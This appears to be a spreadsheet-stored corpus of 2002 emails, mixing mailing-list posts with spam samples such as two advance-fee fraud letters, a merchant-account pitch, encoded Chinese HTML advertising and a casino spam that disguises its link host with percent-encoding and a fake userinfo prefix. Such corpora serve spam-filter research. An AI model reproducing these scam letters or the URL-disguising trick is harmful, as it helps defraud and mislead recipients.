    <t xml:space="preserve">Subject: Re: Apple Sauced...again
</t>
  </si>
  <si>
    <t xml:space="preserve">At 1:16 AM -0400 on 10/3/02, Gary Lawrence Murphy wrote:
 &gt;   "The first question I ask myself when something doesn't seem to be
 &gt;   beautiful is why do I think it's not beautiful. And very shortly you
 &gt;   discover that there is no reason." -- John Cage
 "When I'm working on a problem, I never think about beauty. I think only
 how to solve the problem. But when I have finished, if the solution is not
 beautiful, I know it is wrong."  -- R. Buckminster Fuller
 "Simplicity is the highest goal, achievable when you have overcome all
 difficulties." -- Frederic Chopin
 "Externalities are the last refuge of the dirigistes." -- Friedrich Hayek
 -- 
 -----------------
 R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 44 Farquhar Street, Boston, MA 02131 USA
 "The stoical scheme of supplying our wants by lopping off our
 desires is like cutting off our feet when we want shoes."
  -- Jonathan Swift
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] FWD [fort] Evidence Britons Were In The US In The6th Century
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; Barbara Blithered;
 &gt; &gt; Others indicators this was a late invention are the use of the f rune
 &gt; &gt; not only for "f", but inverted to mean "ff" (the welsh "v" phoneme) -
 &gt; Stew Stired; 
 &gt; Isn't it the other way round, f(welsh)=v(english) ff(welsh)=f(english).
 Barbara Babbles;
 Mea culpa. That's what I get for reading my welsh dictionary upside
 down; "F"n trouble ;-).
 Barbara
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: E-Business                                         [jdnhd]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 HOW TO SUBSTANTIALLY INCREASE SALES:
 Easily accept major credit cards right away!
 ===========================================
 Submit the following via email to receive more information.
 Or vist our online submition
 http://usuarios.tripod.es/aj222
 NAME:
 PHONENUMBER:
 AND BEST TIME TO CALL:
 ===========================================
 Merchant Status will help you increase sales by an
 incredible 50% to 100%. Stop losing valuable sales!
 With one phone call you can be:
 Accepting all major credit cards!
 Accepting checks over the net or by Fax!
 Accepting real time processing for member sites!
 Gaining custumer loyalty and trust!
 Close the sale now. No more wondering if "The check
 is in the mail"
 We specialize in helping businesses who
 are just starting out with no credit, poor credit, or
 even if you have great credit.
 Almost everyone is approved!
 ===========================================
 Submit the following via email to receive more information.
 NAME:
 PHONENUMBER:
 AND BEST TIME TO CALL:
 ===========================================
 To be taken off the list type remove in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best served cold
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#best_served_cold
 Date: 2002-10-02T09:51:54-05:00
 Thank you[1]. I needed that. We now return you to your regularly scheduled 
 programming.
 [1] http://www.daypop.com/top/archive/2002/10/20021002000000.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: My source: RE: A biblical digression
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;From what I read, the rest of it looked quite good so it does seem odd
 they would make the seemingly incorrect blanket statement about the
 Hebrew for "steal". One possibility is that the page is a summary of
 information gathered from a variety of sources of varying qualities.
 James
 On Sun, 25 Aug 2002 10:17:46 -0700, "John Hall" &lt;johnhall@evergo.net&gt;
 said:
 &gt; Remember I didn't say it was necessarily a good source, just that it
 &gt; looked good.
 &gt; 
 &gt; The site was http://www.religioustolerance.org/chr_10c7.htm
 &gt; 
 &gt; My memory of what they said was accurate.  I do not have the competence
 &gt; to defend what they said.  James Tauber's response indicates a breadth
 &gt; of knowledge I can't match.
 -- 
   James Tauber
   jtauber@jtauber.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Frog Fall at Cheapside
</t>
  </si>
  <si>
    <t xml:space="preserve">Near the end of his *Memoirs of Extraordinary Popular Delusions and the
 Madness of Crowds* (1851), Charles Mackay discusses various catch phrases
 briefly popular in mid-19th-century London. One of them, he observes,
 "like a mushroom, seems to have sprung up in the night, or, like a frog in
 Cheapside, to have come down in a sudden shower. One day it was unheard,
 unknown, uninvented; the next it pervaded London."
 Was "like a frog in Cheapside" (or something similar) a catch phrase
 itself, or did Mackay come up with the simile on his own?
 And to what event or events does it refer?
 I didn't find anything relevant in Partridge's *A Dictionary of Catch
 Phrases.*
 bc
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Looking for a more powerful website? Try GeoCities for $8.95 per month.
 Register your domain name (http://your-name.com). More storage! No ads!
 http://geocities.yahoo.com/ps/info
 http://us.click.yahoo.com/aHOo4D/KJoEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: revocation of grlygrl201@
</t>
  </si>
  <si>
    <t xml:space="preserve">beberg, would you rather mrsrobinson@bellsouth.net?
 into plastics too,
 schuman
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Joseph S. Barrera III
 Sent: Sunday, September 01, 2002 7:52 PM
 To: FoRK
 Subject: Re: revocation of grlygrl201@
 bitbitch@magnesium.net wrote:
  &gt; Well Beberg, unless you're really into Anime and actually hold true
  &gt; that dead people can send email, I think Geege's subject is just
  &gt; dandy.
 Funny you should mention that, as I just came back from refilling
 the green coolant in my Navi.
  &gt; (bonus FoRK points if Adam knows what anime i'm refering to)
 I guess I don't get any points, do I? No, didn't think so.
 - Joe
 P.S. We've just started watching Boogiepop Phantom...
 -- 
 The Combatant State is your father and your mother, your only
 protector, the totality of your interests. No discipline can
 be stern enough for the man who denies that by word or deed.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Business card design
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#business_card_design
 Date: 2002-10-06T23:28:00-05:00
 _Michael Barrish_: Poem[1]. &amp;#8220;Here are the 15 most popular Oblivio search 
 strings since October 1. I consider it a poem.&amp;#8221;
 [1] http://oblivio.com/road/02100601.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] PerMsgStatus.pm error?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 05 September 2002 04:10 CET Mike Burger wrote:
 &gt; Just loaded up SA 2.40 from Theo's RPMs...spamassassin-2.40-1 and
 &gt; perl-Mail-SpamAssassin-2.40-1 on a RH 7.1 system with perl 5.6.1 running
 &gt; on it.
 &gt;
 &gt; I'm getting messages that seem to indicate that SA can't find
 &gt; PerMsgStatus, like so:
 &gt;
 &gt; Sep  4 21:01:59 burgers spamd[17579]: Failed to run CTYPE_JUST_HTML
 &gt; SpamAssassin test, skipping: ^I(Can't locate object method
 &gt; "check_for_content_type_just_html" via package
 &gt; "Mail::SpamAssassin::PerMsgStatus" (perhaps you forgot to load
 &gt; "Mail::SpamAssassin::PerMsgStatus"?) at
 &gt; /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line
 &gt; 1814, &lt;STDIN&gt; line 21. )
 &gt;
 &gt;[...]
 &gt;
 &gt; Any ideas?
 Perl doesn't complain that it can't find PerMsgStatus.pm but the function 
 check_for_content_type_just_html(). Do you probably have some old rules 
 files still lurking around? This test existed in 2.31 but is gone/was 
 renamed with 2.40.
 Malte
 -- 
 -- Coding is art.
 --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</si>
  <si>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Re: The 3rd Annual Consult Hyperion Digital Identity Forum
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 To: rah@shipwright.com
 From: hacker@vudu.net
 Date: Thu, 03 Oct 2002 06:01:38 -0700 (PDT)
 Subject: Re: The 3rd Annual Consult Hyperion Digital Identity Forum
 The guy messed up his own URL. It should be
 http://www.digitalidforum.com which redirects to
 http://www.consult.hyperion.co.uk/digid3.html
 "R. A. Hettinga" wrote:
 &gt;
 &gt; Dear All,
 &gt;
 &gt; See www.digitalidentityforum.com for more details. Speakers
 include
 &gt; Microsoft and Liberty Alliance, UK central and local government,
 &gt; law
 &gt; enforcement, financial services (Egg and RBS/NatWest), EC
 Research
 &gt; Centre, a
 &gt; psychologist and others. Look forward to seeing you there.
 &gt;
 &gt; Regards,
 &gt; Dave Birch.
 &gt;
 &gt; --
 &gt; -- David Birch, Director, Consult Hyperion
 &gt; --
 &gt; -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
 &gt; -- mail dave@chyp.com, web &lt;a
 href="http://mail.vudu.net//jump/http://www.chyp.com"&gt;http://www.chyp.com&lt;/a&gt;
 &gt; --
 &gt; -- See you at the 2nd Annual Digital Transactions Forum in
 &gt; Singapore
 &gt; -- October 16th/17th 2002, see
 &gt; &lt;a
 href="http://mail.vudu.net//jump/http://www.digitaltransactionsforum.com"&gt;http://www.digitaltransactionsforum.com&lt;/a&gt;/
 &gt;
 &gt; --- end forwarded text
 &gt;
 &gt;
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &amp;lt;mailto: rah@ibuc.com&amp;gt;
 &gt; The Internet Bearer Underwriting Corporation &amp;lt;&lt;a
 href="http://mail.vudu.net//jump/http://www.ibuc.com/&amp;gt"&gt;http://www.ibuc.com/&amp;gt&lt;/a&gt;;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; &amp;quot;... however it may deserve respect for its usefulness and
 &gt; antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience.&amp;quot; -- Edward Gibbon, 'Decline and Fall of the
 Roman
 &gt; Empire'
 &gt;
 &gt; For help on using this list (especially unsubscribing), send a
 &gt; message to
 &gt; &amp;quot;dcsb-request@reservoir.com&amp;quot; with one line of text:
 &amp;quot;help&amp;quot;.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</si>
  <si>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On Wed, Aug 21, 2002 at 10:16:33AM -0500, Frank Pineau wrote:
 &gt; Omaha Steaks *is* spam.  I bought something from them once.  *Great* steaks, but
 &gt; then they started calling me, emailing me, snail-mailing, constantly.  I once
 If you sign up for something, it's not spam by definition, aggressive as
 they may be.  (I told them to stop calling me, and they stopped, so ...)
 -- 
 Randomly Generated Tagline:
 We didn't put in ^^ because then we'd have to keep telling people what
  it means, and then we'd have to keep telling them why it doesn't short
  circuit.  :-/
               -- Larry Wall in &lt;199707300650.XAA05515@wall.org&gt;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</si>
  <si>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REQUEST FOR ASSISTANCE
</t>
  </si>
  <si>
    <t xml:space="preserve">BARRISTER ADEWALE COKER CHAMBERS
 Legal Practitioners / Notary Public
 Blk 804- Law House Building
 Lagos-Nigeria.
 For your kind attention,
               REQUEST FOR ASSISTANCE
 It is my humble pleasure to write you this letter irrespective of the fact that you do not know me.  However,I am in search of a reliable and trustworthy person that can handle a confidential transaction of this nature.
 I am BARRISTER ADEWALE COKER, a family lawyer to our former military rule,General Sani Abacha who died suddenly in power some years ago. Since his untimely demise, the family has suffered a lot of harassment from the regimes that succeeded him.  The regime and even the present civilian government are made up of Abacha's enemies.Recently, the wife was banned from traveling outside Kano State their home state as a kind of house arrest and the eldest son still in detention.Although, a lot of money have been recovered from Mrs. Abacha since the death of her husband by the present government, there's still huge sums of money in hard currencies that we have been able to move out of the country for safe keeping to the tune of US$50 million.This money US$50 Million is already in North American and if you are interested,we will prepare you as the beneficiary of the total funds,and you will share 25% of the total funds after clearance from the Security Company.
 Note, there is no risk involved in this project because l am involved as Abacha's confidant.Please you should keep this transaction a top secret and we are prepared to do more business with you pending your approach towards this project.I await your urgent response.Thanks.
 Yours Faithfully
 BARRISTER ADEWALE COKER.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</si>
  <si>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[dcms-dev] MY INHERITANCE
</t>
  </si>
  <si>
    <t xml:space="preserve">Date:May 16,2002. 
 Email:edum@hkem.com. 
 Dear Sir, 
 I am Mr.Eduado de Mello, one of the Principal 
 Commanders of the Union for the Total Independence of 
 Angola,UNITA.Well needless telling a very long story 
 here for our story is indeed interwoven with the 
 history of the world and the liberation struggle in 
 the Southern African region of the African continent. 
 The bubble burst just about some weeks ago today when my supreme 
 commander, the late Dr.Jonas Savimbi was killed in an 
 encounter with the government forces of the MPLA 
 government of my country.The rest is now history but 
 suffice it to say that I am tired of the unfortunate 
 role of waging a war against my fatherland.I have 
 therefore decided to pull out my troupes from the bush 
 even if the other field commanders decide otherwise am 
 therefore poised to effect a new beginning in my life 
 and I have decided to make South Africa my new home at 
 least for the interim period until I am sufficiently 
 sure that I would be welcome home whole heartedly by 
 the MPLA government in Luanda the capital of Angola. 
 Needles to say I was the single most important 
 commander who was very close to the late supreme 
 commander; Dr.Jonas Savimbi.Indeed because I am a 
 brother to one of his wives,he confided in me a great 
 deal.The result of such trust is my reason for 
 contacting you I was the commander whom he sent to 
 deposit the sum of Thirty two million USD ($32million) 
 with a security/finance company in South Africa.This 
 was immediately after the events of September 11,2001 
 in the United States of America.Indeed it had become 
 increasingly difficult to move large volumes of money 
 around the world particularly for a liberation 
 movement like UNITA hence the recourse to keeping the 
 money with the security company in South Africa. I 
 have decided to inherit this money which was taken out 
 and deposited with the said security/finance company 
 as cash in Hundred dollar denominations.The money is 
 kept in my signature and would have been used in the 
 purchase of arms and ammunition for the purposes of 
 continuing the civil war in Angola.The supreme 
 commander is dead and as already stated I have decided 
 to quite the whole thing and this is without regard to 
 the fact that other commanders may wish to continue ! 
 I want to cooperate with you in my decision to inherit 
 the $32million.I am still in the bush here but I have 
 been able to establish contact with the company in 
 South Africa to the effect that I would soon come to 
 take possession of the money that I kept with them. 
 Note also that I deposited the money as a foreign 
 national who is the head of a Mining company in Angola 
 (Never as a commander of UNITA). If you are able to 
 cooperate with me over this am willing to give you 20% 
 of the $32million.Please come back to me through 
 email: edum@hkem.com.The security/finance 
 company is standing by to receive my instructions on 
 this and I will link you up with them as soon as you 
 are ready to take possession of the $32million. 
 Finally you are to note that in you reply, you are to 
 state your residential or company address and if 
 possible send a copy of your international passport so 
 as to assure me that my money is safe in your hands. 
 Yours truly, 
 Eduado de Mello 
 _______________________________________________
 dcms-dev mailing list
 dcms-dev@eros.cs.jhu.edu
 http://www.eros-os.org/mailman/listinfo/dcms-dev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Got me a crappy laptop
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002, Jon wrote:
 &gt; I has just been given an old Toshiba CS100 with earliest pentium and 400mb
 &gt; of HD but only a floppy drive on it, its got Win3.1 which is funny to see
 &gt; again but gonna be cleared as soon as i stop messing with it. What I was
 &gt; wondering was could anyone advise what O/S would be good for this, I want a
 &gt; small usable *nix distro for it that i can transfer to it fom floppy.
 &gt; Connecting this to Winblows&gt;i know that winblows allows pier-to-pier
 &gt; connections over serial and parellel ports to other winblows but is this
 &gt; easy do for connecting winblows to *nix???
 Have done exactly this with debian, only I used a PCMCIA network card and
 did it off ftp.esat.net (ucd bandwidth is rather good).
 However, if you've another machine, look into this null modem cable jobby:
 http://rosebud.sps.queensu.ca/~edd/t100cs.html
 whether you can connect that to direct cable connectionI've no idea.  You
 could however, put the files onto windows, boot onto a ILUG BBC[tm] and
 mount the fat32 partition.
 Easier/Quicker way is to get your hands on a PCMCIA nic.  Also makes the
 maptop far more useful in the long run.
 Gavin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] mirroring on a running system
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed 14 Aug 2002 08:42, John P. Looney wrote:
 &gt; It likely means that I was just lucky I put the failed-disk
 &gt; directive after the raid-disk one :)
 Extremely lucky.  The other way around would have toasted your
 existing volume.
 &gt; Anyway. It's doesn't quite boot right, with /=/dev/md0 in fstab. On
 &gt; boot, I see:
 In order to autodetect soft RAID volumes at boot, you need to set the
 partition type on all the relevant raw disk partitions to 0xFD.  I'm
 not sure about the initrd stuff; as I don't use it myself.
            Colm
 -- 
 Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
 Office closed on Mondays.  If you want anything on Monday, come on Tuesday.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?re:=B7Q=ADn=ADP=B4I,=A7A=C1=D9=ADn=B5=A5=A6h=A4[?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_dDSo3gGXsd1lAyTI8
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_dDSo3gGXsd1lAyTI8AA"
 ------=_NextPart_dDSo3gGXsd1lAyTI8AA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29u
 dGVudD0iemgtdHciPg0KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
 RnJvbnRQYWdlIDUuMCI+DQo8bWV0YSBuYW1lPSJQcm9nSWQiIGNvbnRlbnQ9IkZyb250UGFnZS5F
 ZGl0b3IuRG9jdW1lbnQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50
 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8dGl0bGU+s2+sT6llsFWl0bFNt368c6dppL2l
 caVOtW+kxaq9sbWmXqtItUyqa7G1pqwgy+c8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0K
 PHAgc3R5bGU9Im1hcmdpbi10b3A6IDBweDsgbWFyZ2luLWJvdHRvbTogMHB4Ij48Zm9udCBjb2xv
 cj0iIzgwODA4MCI+DQqzb6xPqWWwVaXRsU23frxzp2mkvaVxpU61b6TFqr2xtaZeq0i1TKprsbWm
 rCDL5yB+ICE8L2ZvbnQ+PC9wPg0KPGhyIFNJWkU9IjEiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4N
 CiAgPGNlbnRlcj4NCiAgPHRhYmxlIHN0eWxlPSJib3JkZXI6IDFweCBkb3R0ZWQgI0ZGMDAwMDsg
 OyBib3JkZXItY29sbGFwc2U6Y29sbGFwc2UiIGhlaWdodD0iMzY1IiBjZWxsU3BhY2luZz0iMCIg
 Y2VsbFBhZGRpbmc9IjAiIHdpZHRoPSI2MDQiIGJvcmRlcj0iMCIgYm9yZGVyY29sb3JsaWdodD0i
 IzAwODAwMCIgYm9yZGVyY29sb3I9IiMxMTExMTEiPg0KICAgIDx0cj4NCiAgICAgIDx0ZCB2QWxp
 Z249ImNlbnRlciIgYWxpZ249Im1pZGRsZSIgd2lkdGg9IjU5OCIgYmdDb2xvcj0iI0ZGRkYwMCIg
 aGVpZ2h0PSIzNjUiPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+oUA8L3A+DQogICAgICA8cCBh
 bGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZG
 Ij6mbqpCpM2w2iE8L2ZvbnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFj
 ZT0ivNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+DQogICAgICCzXKZopEiv4KRPqFOm
 s6Txp0GmbiymXaywtHi0pKRGrsm+9zwvZm9udD48L3A+DQogICAgICA8cCBhbGlnbj0iY2VudGVy
 Ij48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6p0qVIpGq1b6dR
 passs9C3fq1QtEksPC9mb250PjwvcD4NCiAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZh
 Y2U9IrzQt6LF6SIgc2l6ZT0iNCIgY29sb3I9IiMwMDAwRkYiPrNcpmg8L2ZvbnQ+PGZvbnQgZmFj
 ZT0ivNC3osXpIiBjb2xvcj0iI0ZGMDAwMCIgc2l6ZT0iNiI+vve3fDwvZm9udD48Zm9udCBmYWNl
 PSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6lbqr5rsksqbmpuaV1PC9mb250Pjxm
 b250IGZhY2U9IrzQt6LF6SIgY29sb3I9IiNGRjAwRkYiIHNpemU9IjYiPqazM6ztxMEhPC9mb250
 PjwvcD4NCiAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IrzQt6LF6SIgc2l6ZT0i
 NCIgY29sb3I9IiMwMDAwRkYiPrROpl2ssCZxdW90OzwvZm9udD48Zm9udCBmYWNlPSK80Leixeki
 IGNvbG9yPSIjMDAwMEZGIiBzaXplPSI1Ij6ko6XMpN8mcXVvdDs8L2ZvbnQ+PGZvbnQgZmFjZT0i
 vNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+s3m0TrNcpmikSKZis2+4zKaopVw8L2Zv
 bnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0ivNC3osXpIiBzaXpl
 PSI0IiBjb2xvcj0iIzAwMDBGRiI+s8yxTbd+qrq5zraku7K+ybF6PC9mb250PjwvcD4NCiAgICAg
 IDxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly92aWMuaDhoLmNvbS50dy8iPg0KICAg
 ICAgPGZvbnQgc2l6ZT0iNiIgZmFjZT0ivNC3osXpIiBjb2xvcj0iI0ZGMDAwMCI+MrhVpLi26qRA
 rdOkcKbRwfOqurnaPC9mb250PjwvYT48L3A+DQogICAgICA8cCBhbGlnbj0iY2VudGVyIj4yMKTA
 xMGs3cC0s2+t0773t3wsp0G0TqxPptukdqq6pUSkSCGvrLF6pm65QjwvcD4NCiAgICAgIDxwPjxm
 b250IGNvbG9yPSIjZmYwMGZmIj48YSBocmVmPSJodHRwOi8vdmljLmg4aC5jb20udHcvIj4NCiAg
 ICAgIGh0dHA6Ly92aWMuaDhoLmNvbS50dzwvYT48L2ZvbnQ+PHA+PGZvbnQgY29sb3I9IiNGRjAw
 MDAiPg0KICAgICAgPHNwYW4gbGFuZz0iZW4tdXMiPjxmb250IHNpemU9IjciPnBzOjwvZm9udD48
 L3NwYW4+t1G2aaRAqEKqvrlEpnCm86ZirmG7tMNQpc669Lj0wcikar/6LKVpPC9mb250Pjxmb250
 IHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6nS7ZPs/imV7r0uPSvU7BWPC9mb250PjxwPg0KICAg
 ICAgPGZvbnQgY29sb3I9IiNGRjAwMDAiPqZwqkesebZxuUywqqzdpKOo7L11pFe8dqT5LKVpr8Go
 +qdLtk+z0Ld+pfq60DwvZm9udD48Zm9udCBjb2xvcj0iIzAwMDBGRiI+KL3QpmKtuq22r2SkValt
 ple5cbjcpu2nfSk8L2ZvbnQ+PHA+oUA8cD4NCiAgICAgIKFAPHA+oUA8cD6hQDwvdGQ+DQogICAg
 PC90cj4NCiAgPC90YWJsZT4NCiAgPC9jZW50ZXI+DQo8L2Rpdj4NCjxociBTSVpFPSIxIj4NCjxw
 IHN0eWxlPSJtYXJnaW4tdG9wOiAwcHg7IG1hcmdpbi1ib3R0b206IDBweCIgYWxpZ249ImNlbnRl
 ciI+DQo8Zm9udCBjb2xvcj0iI2ZmMDAwMCI+pnCms6W0wlq90KijvcyhQaSjt1GmQaasqOymuatI
 vdCr9iZuYnNwOyAtJmd0OyZuYnNwOyAoPGEgaHJlZj0iaHR0cDovL3gtbWFpbC5oOGguY29tLnR3
 IiB0YXJnZXQ9Il9ibGFuayI+qdqmrLxzp2k8L2E+KTwvZm9udD48L3A+DQoNCjwvYm9keT4NCg0K
 PC9odG1sPg==
 ------=_NextPart_dDSo3gGXsd1lAyTI8AA--
 ------=_NextPart_dDSo3gGXsd1lAyTI8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi Erin, are we going to do it again tonight?H
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor=3D"#003300"&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;Congratulations, 
 You Won $30 Free&lt;BR&gt;Today At The Internet's Best &amp;amp; Most&lt;BR&gt;Trusted On-=
 Line 
 Casino!&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#669966&gt;&lt;FONT color=3D#ffffff size=3D4&gt;To =
 Collect Your 
 $30 Cash &lt;/FONT&gt;&lt;A 
 href=3D"http://81.9.8.41"&gt;&lt;FONT 
 size=3D4&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://81.9.8.41"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%81900955key=3D96589521081900955index=3DA2=
 1r7P6qW81900955.79048@%77%77%77.%70%72%65%73%74%69%67%65%63%61%73%69%6e%6f=
 .%63%6f%6d/%70ic/%70%72e%76ie%77%73/%62i%67/%62%6cac%6b%6aac%6b.%6a%70%67"=
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;To Collect Your $30 Cash =
 &lt;/FONT&gt;&lt;A 
 href=3D"http://81.9.8.41"&gt;&lt;FONT 
 size=3D5&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://81.9.8.41"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%21362822key=3D96589521021362822index=3DA2=
 1r7P6qW21362822.4140327@%77%77%77.%70%72%65%73%74%69%67%65%63%61%73%69%6e%=
 6f.%63%6f%6d/%70ic/a%77a%72%64%73/%67om%5f%74o%70ca%73i%6eo%5f%64a%72%6b%3=
 1.%67i%66" 
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;
 &lt;form name=3D"form" method=3D"post" action=3D"http://81.9.8.41/r/process_c=
 leanlist.php"&gt;
 &lt;DIV align=3Dcenter&gt; 
             &lt;table width=3D"391" border=3D"1" cellspacing=3D"0" cellpaddin=
 g=3D"0" align=3D"center" bordercolor=3D"#000000"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"2" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;
             &lt;P&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;This=
  message is sent in compliance of the new 
             e-mail bill:&lt;BR&gt;SECTION 301 Per Section 301, Paragraph (a)(2)(=
 C) of 
             S. 1618,&lt;BR&gt;Further transmissions to you by the sender of this=
  email 
             maybe&lt;BR&gt;stopped at no cost to you by entering your email addr=
 ess 
             to&lt;BR&gt;the form in this email and clicking submit to be 
             automatically&lt;BR&gt;   
                                removed. &lt;/font&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;To be Removed f=
 rom our 
             Opt-In mailing list. Please enter your email address in the pr=
 ovided 
             box below and click remove, thank you. 
       &lt;/FONT&gt;&lt;/P&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt; 
                           &lt;input type=3D"hidden" name=3D"subject" value=3D=
 "REMOVE"&gt;
                           &lt;input name=3D"email" size=3D"30" 
            &gt;
                           &lt;input type=3D"submit" name=3D"Submit" value=3D"=
 REMOVE"&gt;
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;Your 
                           E-mail Address Will Be Immediately Removed From =
 All Mailing Lists&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
